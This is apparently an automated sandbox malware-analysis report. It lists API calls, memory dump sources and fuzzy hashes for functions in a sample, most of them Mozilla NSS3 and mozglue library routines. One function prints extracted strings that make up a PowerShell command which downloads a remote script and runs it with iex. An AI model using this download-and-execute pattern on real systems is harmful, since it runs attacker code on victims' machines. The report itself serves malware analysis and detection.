                                                                                                                                                                                          Function 6C570C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?,?,00000000,?,?), ref: 6C570CB3
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?), ref: 6C570DC1
                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?), ref: 6C570DEC
                                                                                                                                                                                            • Part of subcall function 6C590F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C532AF5,?,?,?,?,?,6C530A1B,00000000), ref: 6C590F1A
                                                                                                                                                                                            • Part of subcall function 6C590F10: malloc.MOZGLUE(00000001), ref: 6C590F30
                                                                                                                                                                                            • Part of subcall function 6C590F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C590F42
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570DFF
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C571444,?,00000001,?,00000000), ref: 6C570E16
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570E53
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?,?,00000000), ref: 6C570E65
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570E79
                                                                                                                                                                                            • Part of subcall function 6C581560: TlsGetValue.KERNEL32(00000000,?,6C550844,?), ref: 6C58157A
                                                                                                                                                                                            • Part of subcall function 6C581560: EnterCriticalSection.KERNEL32(?,?,?,6C550844,?), ref: 6C58158F
                                                                                                                                                                                            • Part of subcall function 6C581560: PR_Unlock.NSS3(?,?,?,?,6C550844,?), ref: 6C5815B2
                                                                                                                                                                                            • Part of subcall function 6C54B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C551397,00000000,?,6C54CF93,5B5F5EC0,00000000,?,6C551397,?), ref: 6C54B1CB
                                                                                                                                                                                            • Part of subcall function 6C54B1A0: free.MOZGLUE(5B5F5EC0,?,6C54CF93,5B5F5EC0,00000000,?,6C551397,?), ref: 6C54B1D2
                                                                                                                                                                                            • Part of subcall function 6C5489E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5488AE,-00000008), ref: 6C548A04
                                                                                                                                                                                            • Part of subcall function 6C5489E0: EnterCriticalSection.KERNEL32(?), ref: 6C548A15
                                                                                                                                                                                            • Part of subcall function 6C5489E0: memset.VCRUNTIME140(6C5488AE,00000000,00000132), ref: 6C548A27
                                                                                                                                                                                            • Part of subcall function 6C5489E0: PR_Unlock.NSS3(?), ref: 6C548A35
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                          • Opcode ID: 1e42ff70ce70473ce6e8aff2c088b6c3ef333e7a4638230a0434049cd479f880
                                                                                                                                                                                          • Instruction ID: 9e5470c4489737ebb52d3f64a48a1449f85c3dc363a0b298481c9b95ccc62a91
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e42ff70ce70473ce6e8aff2c088b6c3ef333e7a4638230a0434049cd479f880
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651B7F6D002009FEB109F64DC81AAB37E89F8521CF550465EC159B712FB32ED5987B2
                                                                                                                                                                                          Function 6C526E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C526ED8
                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C526EE5
                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C526FA8
                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C526FDB
                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C526FF0
                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C527010
                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C52701D
                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C527052
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                          • Opcode ID: 5294911c95cbcfb244dc316d760eebaa02350f6b1e84d7858396c9eadc9cdd4c
                                                                                                                                                                                          • Instruction ID: a2d396cc7616eb1ed33aca6bcf8d048ad8621dcecc565d8fc6bb0b2b71896f8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5294911c95cbcfb244dc316d760eebaa02350f6b1e84d7858396c9eadc9cdd4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6361B1B1E14206CBDF14CB64CC506EEB7F2AF85308F284164D814AB795EB399C09CB91
                                                                                                                                                                                          Function 00032D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00032EC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\ProgramData\, xrefs: 00032DA3
                                                                                                                                                                                          • .ps1, xrefs: 00032DF3
                                                                                                                                                                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00032E18
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00032E5B
                                                                                                                                                                                          • ')", xrefs: 00032E13
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          • API String ID: 2215929589-1989157005
                                                                                                                                                                                          • Opcode ID: 50675bba329128670eadd80dbb0a3a327938d42acd9185937545c13ddedb0ae9
                                                                                                                                                                                          • Instruction ID: 10163ea3691b0c6ae040c3447d9ea406715d7292433540aad54e6ff4ce8b9e26
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50675bba329128670eadd80dbb0a3a327938d42acd9185937545c13ddedb0ae9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2141AA72E4112DEBCF11EBE4ED429CEB7B8AF08700F514565F914B7116DB70AE4A8B90
                                                                                                                                                                                          Function 6C57AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C57AB3E,?,?,?), ref: 6C57AC35
                                                                                                                                                                                            • Part of subcall function 6C55CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C55CF16
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C57AB3E,?,?,?), ref: 6C57AC55
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C57AB3E,?,?), ref: 6C57AC70
                                                                                                                                                                                            • Part of subcall function 6C55E300: TlsGetValue.KERNEL32 ref: 6C55E33C
                                                                                                                                                                                            • Part of subcall function 6C55E300: EnterCriticalSection.KERNEL32(?), ref: 6C55E350
                                                                                                                                                                                            • Part of subcall function 6C55E300: PR_Unlock.NSS3(?), ref: 6C55E5BC
                                                                                                                                                                                            • Part of subcall function 6C55E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C55E5CA
                                                                                                                                                                                            • Part of subcall function 6C55E300: TlsGetValue.KERNEL32 ref: 6C55E5F2
                                                                                                                                                                                            • Part of subcall function 6C55E300: EnterCriticalSection.KERNEL32(?), ref: 6C55E606
                                                                                                                                                                                            • Part of subcall function 6C55E300: PORT_Alloc_Util.NSS3(?), ref: 6C55E613
                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C57AC92
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C57AB3E), ref: 6C57ACD7
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C57AD10
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C57AD2B
                                                                                                                                                                                            • Part of subcall function 6C55F360: TlsGetValue.KERNEL32(00000000,?,6C57A904,?), ref: 6C55F38B
                                                                                                                                                                                            • Part of subcall function 6C55F360: EnterCriticalSection.KERNEL32(?,?,?,6C57A904,?), ref: 6C55F3A0
                                                                                                                                                                                            • Part of subcall function 6C55F360: PR_Unlock.NSS3(?,?,?,?,6C57A904,?), ref: 6C55F3D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                          • Opcode ID: ae375658900105e574b2672dd019e3ffe5fcbea1992c619473711bc370d30ffe
                                                                                                                                                                                          • Instruction ID: 0b7145313e873f9155814db26c512be63ae5658418301ee08c6543933ad98ec8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae375658900105e574b2672dd019e3ffe5fcbea1992c619473711bc370d30ffe
                                                                                                                                                                                          • Instruction Fuzzy Hash: E53129B2E00215AFEB10CF658C419AF776AAFD4328B198529F8149B740EB31EC5587B1
                                                                                                                                                                                          Function 6C558C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C558C7C
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C558CB0
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C558CD1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C558CE5
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C558D2E
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C558D62
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C558D93
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                          • Opcode ID: 5ca07f1d449cd3133d8de68d3e79fea26ab38a849af0bffb4e1f8f09286db147
                                                                                                                                                                                          • Instruction ID: 05083b7f2230ed4fd98004682a8fcd49bf05442526bd88c2149956f7d12d2eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca07f1d449cd3133d8de68d3e79fea26ab38a849af0bffb4e1f8f09286db147
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1315771A41601ABE700AF68CC4079AB7B0BF55318F540137EA26A7B50D770B934CBD2
                                                                                                                                                                                          Function 6C552E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C54E728,?,00000038,?,?,00000000), ref: 6C552E52
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C552E66
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C552E7B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C552E8F
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C552E9E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552EAB
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552F0D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                          • Opcode ID: 573d9450494af9ca2e3e4474621260115e6a261bad76b0f4adda11f73a661942
                                                                                                                                                                                          • Instruction ID: 7ec03555927967e3ce01e5f735aeab1a50de49b99a614ca9b02e791584f023a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 573d9450494af9ca2e3e4474621260115e6a261bad76b0f4adda11f73a661942
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31F676A00505EBEB00AF29EC85876B778EF45258F448665EC0987A11EB31EC64C7E1
                                                                                                                                                                                          Function 6C4584E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4584F3
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45850A
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45851E
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45855B
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45856F
                                                                                                                                                                                          • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4585AC
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45767F
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C457693
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4576A7
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4585B2
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2666944752-0
                                                                                                                                                                                          • Opcode ID: 217b671b40b3abf48b1ab205e56be121acd2eba55324379224511a62582f7879
                                                                                                                                                                                          • Instruction ID: 271ca622e4edff77d43f107980c023395a34aae35a2b90a3654a98ec4077fa0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 217b671b40b3abf48b1ab205e56be121acd2eba55324379224511a62582f7879
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9219C742006018FEB14EF69D888E5AB7B5AF8431EF64482DE55BC3B41DB31F968CB91
                                                                                                                                                                                          Function 6C548C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C548C1B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C548C34
                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C548C65
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C548C9C
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C548CB6
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
